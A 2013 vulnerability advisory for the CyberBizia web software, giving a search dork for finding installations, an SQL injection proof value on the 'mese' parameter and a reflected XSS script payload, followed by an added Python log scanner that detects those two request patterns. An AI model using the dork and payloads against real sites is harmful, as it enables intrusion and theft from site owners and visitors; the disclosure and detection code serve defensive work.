CyberBizia Multiple Vulnerabilities
Posted on 30 August 2013
<pre>
#********************************************************************************
# Exploit Title  : CyberBizia Multiple Vulnerabilities
# Software link  : http://www.cyberbizia.com
# Exploit Author : Ashiyane Digital Security Team
# Tested on      : Windows 7 , Linux
# Google Dork    : intext:"Powered by CyberBizia"
# Date           : 2013/08/29
# --------------------------------------------------------------------
# Exploit 1 : SQL Injection
# Location  : [Target]/myasg/os.asp?elenca=mese&mese=[Sql Injection]
# Proof:
#   [Target]/myasg/os.asp?elenca=mese&mese=1'
# --------------------------------------------------------------------
# Exploit 2 : XSS
# Location  : [Target]/?Title=[xss]
# Proof:
#   [Target]/?Title="/><script>alert(1);</script>
###################### discovered by : ACC3SS ######################
</pre>
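For defenders checking their own web server logs for the two request patterns in this advisory, the following added example (not part of the original advisory) flags requests to /myasg/os.asp whose mese value is not a plain number, and requests whose Title value contains markup characters. The simplified log layout, the sample lines and the assumption that mese is a numeric value are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in a simplified W3C-style layout (assumption):
# date time method uri-stem uri-query status. Not real traffic.
SAMPLE_LOG = """\
2013-08-30 10:00:01 GET /myasg/os.asp elenca=mese&mese=8 200
2013-08-30 10:00:05 GET /myasg/os.asp elenca=mese&mese=1' 500
2013-08-30 10:00:09 GET / Title=News 200
2013-08-30 10:00:12 GET / Title=%22/%3E%3Cscript%3Ealert(1);%3C/script%3E 200
2013-08-30 10:00:15 GET /myasg/os.asp elenca=mese&mese=13 200
"""

NUMERIC = re.compile(r"[0-9]{1,2}")   # assumption: mese is a short number
MARKUP = re.compile(r"[<>\"]")        # characters needed to break out of an attribute or tag


def params(query):
    """Decode a raw query string into {lowercased name: decoded value}."""
    out = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        out[unquote_plus(name).lower()] = unquote_plus(value)
    return out


def classify(line):
    """Return 'sqli-probe', 'xss-probe' or None for one log line."""
    fields = line.split()
    if len(fields) < 6 or line.startswith("#"):
        return None
    path, p = fields[3].lower(), params(fields[4])
    # Pattern 1 from the advisory: non-numeric mese on /myasg/os.asp
    if path == "/myasg/os.asp" and "mese" in p and not NUMERIC.fullmatch(p["mese"]):
        return "sqli-probe"
    # Pattern 2 from the advisory: markup inside the Title parameter
    if "title" in p and MARKUP.search(p["title"]):
        return "xss-probe"
    return None


def scan(log_text):
    """Return [(line_number, finding)] for every suspicious line."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        kind = classify(line)
        if kind:
            hits.append((n, kind))
    return hits
```

The same two checks (accept only digits for mese, HTML-encode Title before output) are what the application itself should enforce server-side; log matching only shows whether the patterns have been requested.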
